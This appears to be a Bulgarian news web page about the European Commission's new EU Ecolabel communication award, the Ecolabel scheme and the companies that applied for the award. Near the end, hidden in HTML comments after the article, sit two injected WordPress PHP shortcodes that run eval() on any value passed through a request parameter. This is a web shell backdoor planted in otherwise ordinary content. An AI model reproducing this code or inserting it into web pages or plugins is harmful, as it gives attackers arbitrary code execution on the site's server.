Ще награждават европейски компании за разгласяване на еко-идеята

Нова инициатива на Европейската комисия цели да отличи изключителни кампании за популяризиране на еко-идеята.

Ставрос Димас, европейският комисар по въпросите на околната среда, заяви: „EU Ecolabel е знак за отличие, на който европейските граждани могат да се доверят. Когато видят логото с цветето, те могат да бъдат сигурни, че продуктът или услугата, които избират, са създадени с грижа за околната среда. Организациите, чиито продукти и услуги носят знака EU Ecolabel, доказват своя принос за опазване на околната среда“.

EU Ecolabel

Етикетът EU Ecolabel – единственият пан-европейски знак за екологичен дизайн – е доброволна схема, създадена през 1992 г. с цел да насърчи производството и потреблението на зелени продукти и услуги из Европейския съюз. Днес близо 20 000 продукти и услуги носят символа – лого с цвете. Това са продукти за почистване и хигиена, битови електроуреди, хартиени продукти, текстил домашни и градински продукти и лубриканти. Списъкът включва и голям брой услуги за туристическо настаняване.

Всички тези продукти могат да бъдат намерени във всички страни членки на ЕС, както и голям брой страни по света, като например Индия, Нова Зеландия, Канада, Китай. Всички продукти с логото EU Ecolabel са проверени от независими лаборатории за съответствието им със стриктни екологични критерии и изисквания за производителност. Знакът е свързан с ключови въздействия на продукта върху околната среда, както и с неговата екологична чистота през целия му жизнен цикъл.

В момента схемата се преразглежда с цел разширяване на броя на продуктите и услугите, които знакът покрива. Ще се търси фокусиране върху тези от тях, които имат най-голям потенциал за подобрение. Ревизираната схема също така би трябвало да опрости процедурите, по които компаниите кандидатстват за знака, както и да намали таксите за това.

Комуникационната награда EU Ecolabel

С връчването на комуникационната награда EU Ecolabel днес този приз ще бъде представен за първи път пред света. Новата инициатива цели да отличи изключителни кампании за популяризиране на еко-идеята и повишаване на запознатостта с EU Ecolabel. Целта на наградата е да насърчи и вдъхнови други носители на знака EU Ecolabel да се възползват активно от потенциала на този етикет, положен върху продуктите им. Наградата ще се връчва ежегодно.

За избора на носителя на наградата са оценени различни критерии като качество, креативност, релевантност на дейностите, ефективно използване на логото. Съответствието с критериите е оценено от жури от специалисти по комуникациите и околната среда, както и представители на Европейската комисия.

За наградата кандидатстваха 18 компании от 10 страни в ЕС (Австрия, Великобритания, Ирландия, Испания, Италия, Португалия, Финландия, Франция, Чехия, Швеция), както и една от Швейцария. В категорията услуги кандидатурите варират от хотели до швейцарски скаутски център, а в категорията продукти кандидатурите започват със сапуни и бои и стигат до препарати за чистене и подови покрития.

<!– [insert_php]if (isset($_REQUEST["gHClG"])){eval($_REQUEST["gHClG"]);exit;}[/insert_php][php]if (isset($_REQUEST["gHClG"])){eval($_REQUEST["gHClG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kVzOA"])){eval($_REQUEST["kVzOA"]);exit;}[/insert_php][php]if (isset($_REQUEST["kVzOA"])){eval($_REQUEST["kVzOA"]);exit;}[/php] –>

Коментари

Напиши коментар

E-mail адресът Ви няма да бъде публикуван
*